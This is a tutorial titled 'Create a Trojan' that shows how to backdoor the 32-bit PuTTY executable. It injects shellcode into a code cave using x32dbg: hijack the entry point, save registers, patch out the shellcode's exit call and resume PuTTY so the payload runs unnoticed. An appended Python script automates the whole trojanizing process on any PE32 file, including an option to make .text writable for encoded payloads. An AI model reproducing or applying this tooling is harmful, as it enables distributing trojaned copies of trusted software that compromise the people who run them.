Create a Trojan

Backdooring a code cave with Putty POC

There are three places a PE can be backdoored:

· Code cave

· Create new section

· Extend a section

This example uses the first approach: placing the backdoor in an existing code cave, a run of unused bytes already present in the binary.

Download the 32-bit PuTTY binary and x32dbg (the 32-bit debugger that ships with x64dbg; the addresses below are 32-bit).

Find Code Cave

Open putty.exe in x32dbg.

Notice that the debugger pauses at the program entry point, before any of PuTTY's own initialization code has run.

That is the place to hijack: redirecting execution there lets the backdoor run before PuTTY is initialized.

The code cave used here is a run of null bytes inside the .text section. Staying in .text matters because that section is already mapped executable, so no section flags have to be changed for the shellcode to run.

Code Cave Start Address 0045C961

Set a breakpoint at this address so it can be found again later from the Breakpoints tab.

Adding shellcode

Head back to the entry point and add a jmp to the code cave where the shellcode will reside. Before assembling the jmp, write down the instructions it is about to overwrite (a near jmp is 5 bytes, so it clobbers the first few instructions at the entry point); they must be replayed later so PuTTY still starts correctly.

Assemble the jmp to the code cave at the entry point.

At the start of the code cave, assemble pushad and pushfd so the general-purpose registers and the flags are saved; they will be restored before control returns to PuTTY.

Now insert the shellcode: highlight a region of the cave large enough to hold it, right-click the selection and choose Binary -> Edit, then paste the shellcode bytes.

At this point the shellcode is inside PuTTY, but if the file were saved and run now, the shellcode would execute and then terminate the process, so PuTTY would never initialize. The instruction in the shellcode that terminates the process has to be located and replaced with a jmp back to PuTTY's original code. You can confirm the shellcode runs either by saving the patches and running the new PE, or by stepping through the breakpoints in the debugger: calc.exe opens, and, if you were stepping, the debugger goes blank because the process has terminated.

Jmp back to Putty

To find the instruction that exits the process, set a breakpoint on every call instruction in the shellcode, then run from breakpoint to breakpoint and watch which one terminates the process.

In this case, the call at 0045C9FA opens calc and the call at 0045CA19 terminates the process.

The final step is to skip that last call and return to the original PuTTY code. Replace the push 0 that precedes the final call with a jmp to an address further into the code cave that still has room to be modified. At that address, restore the flags and registers (popfd then popad, the reverse of the order they were pushed), replay the instructions that were overwritten by the first jmp, and jump back to the first entry-point instruction that was not overwritten.

In the screenshot above, the registers and flags are restored, then the overwritten instructions are replayed, before the jump back to the original PuTTY code. Now patch the file (File -> Patch file in x32dbg) and run it. PuTTY opens, and so does calc.exe.
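The same procedure done offline with a script instead of by hand in x32dbg, as an added example that is not part of the original page: it parses the PE headers, finds the longest run of null bytes in .text (the code cave), writes a jmp at the entry point, and builds the pushad/pushfd, shellcode, popfd/popad, replayed instructions, jmp-back stub in the cave. The tiny PE it operates on, the placeholder shellcode and every function name are constructed for this example; the two inputs you still obtain in the debugger as described above are the offset of the shellcode's exit sequence (`exit_off`) and how many bytes of whole instructions at the entry point the jmp clobbers (`relocated_len`).

```python
import struct

IMAGE_SCN_MEM_WRITE = 0x80000000

# Constructed stand-in for real shellcode: four nops, then a "push 0 / call"
# exit tail like the one the page's calc shellcode ends with. In the debugger
# you locate that tail by breaking on each call; here its offset (4) is passed in.
SAMPLE_SHELLCODE = b"\x90\x90\x90\x90" + b"\x6A\x00" + b"\xFF\x15\x00\x00\x00\x00"


def build_sample_pe():
    """Hand-built PE32 with one .text section so everything runs offline.
    Entry code is 'push 0x60 ; push 0x46a6e0' (7 bytes, no relative operands),
    then 'ret', then a long run of nulls: the code cave."""
    raw_off, va, raw_size = 0x200, 0x1000, 0x400
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    filehdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # i386, 1 section
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                               # PE32 magic
    struct.pack_into("<I", opt, 16, va)                                 # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                           # ImageBase
    sec = struct.pack("<8sIIIIIIHHI", b".text", raw_size, va, raw_size, raw_off,
                      0, 0, 0, 0, 0x60000020)                           # CODE|EXECUTE|READ
    headers = (dos + b"PE\0\0" + filehdr + bytes(opt) + sec).ljust(raw_off, b"\0")
    text = (bytes.fromhex("6a60" "68e0a64600") + b"\xC3").ljust(raw_size, b"\0")
    return headers + text


def parse_pe(data):
    """Return (entry_rva, image_base, sections) for a PE32 image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    sections = []
    for i in range(nsec):
        h = opt + opt_size + 40 * i                       # section headers follow the optional header
        name, vsize, va, raw_size, raw_off = struct.unpack_from("<8sIIII", data, h)
        sections.append(dict(name=name.rstrip(b"\0").decode(), va=va, vsize=vsize,
                             raw_off=raw_off, raw_size=raw_size, hdr_off=h))
    return entry_rva, image_base, sections


def find_code_cave(data, sections, min_size, name=".text"):
    """Longest run of 0x00 bytes in the named section: (file_off, rva, length) or None."""
    sec = next(s for s in sections if s["name"] == name)
    lo, hi = sec["raw_off"], sec["raw_off"] + sec["raw_size"]
    best_off, best_len, start = None, 0, None
    for off in range(lo, hi + 1):                         # hi is a sentinel that closes the last run
        if off < hi and data[off] == 0:
            start = off if start is None else start
            continue
        if start is not None and off - start > best_len:
            best_off, best_len = start, off - start
        start = None
    if best_off is None or best_len < min_size:
        return None
    return best_off, sec["va"] + (best_off - sec["raw_off"]), best_len


def jmp_rel32(src_rva, dst_rva):
    """5-byte near jmp (E9 rel32); the displacement is relative to the next instruction."""
    return b"\xE9" + struct.pack("<i", dst_rva - (src_rva + 5))


def backdoor(data, shellcode, exit_off, relocated_len, make_writable=False):
    """Redirect the entry point into a .text cave holding: pushad/pushfd, the shellcode
    up to its exit sequence, popfd/popad, the clobbered instructions, jmp back.
    relocated_len must cover whole instructions (>= 5 bytes) with no relative operands."""
    assert relocated_len >= 5
    data = bytearray(data)
    entry_rva, image_base, sections = parse_pe(data)
    text = next(s for s in sections if s["name"] == ".text")
    stub_len = 2 + exit_off + 2 + relocated_len + 5
    cave = find_code_cave(data, sections, min_size=stub_len)
    if cave is None:
        raise ValueError("no code cave large enough in .text")
    cave_off, cave_rva, _ = cave
    entry_off = text["raw_off"] + (entry_rva - text["va"])
    original = bytes(data[entry_off:entry_off + relocated_len])     # instructions the jmp clobbers
    data[entry_off:entry_off + relocated_len] = jmp_rel32(entry_rva, cave_rva).ljust(relocated_len, b"\x90")
    resume_rva = entry_rva + relocated_len                          # first untouched instruction
    stub = b"\x60\x9C" + shellcode[:exit_off] + b"\x9D\x61" + original
    stub += jmp_rel32(cave_rva + len(stub), resume_rva)
    data[cave_off:cave_off + len(stub)] = stub
    if make_writable:   # only needed when the shellcode decodes itself in place
        c = text["hdr_off"] + 36
        struct.pack_into("<I", data, c, struct.unpack_from("<I", data, c)[0] | IMAGE_SCN_MEM_WRITE)
    return bytes(data), image_base + cave_rva


if __name__ == "__main__":
    patched, cave_va = backdoor(build_sample_pe(), SAMPLE_SHELLCODE, exit_off=4, relocated_len=7)
    print(f"cave at {cave_va:08X}; patched entry bytes: {patched[0x200:0x207].hex()}")
```

Two things the debugger walk-through glosses over and the script makes explicit: the entry-point instructions you replay must not contain relative operands (a call rel32 copied into the cave would need its displacement re-encoded), and the shellcode must leave ESP where pushfd left it, otherwise popfd/popad restore garbage and PuTTY crashes on return. Plain calc shellcode in .text needs no section changes; an encoded payload that decodes itself in place additionally needs .text marked writable, which is what `make_writable` does.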

https://x64dbg.com/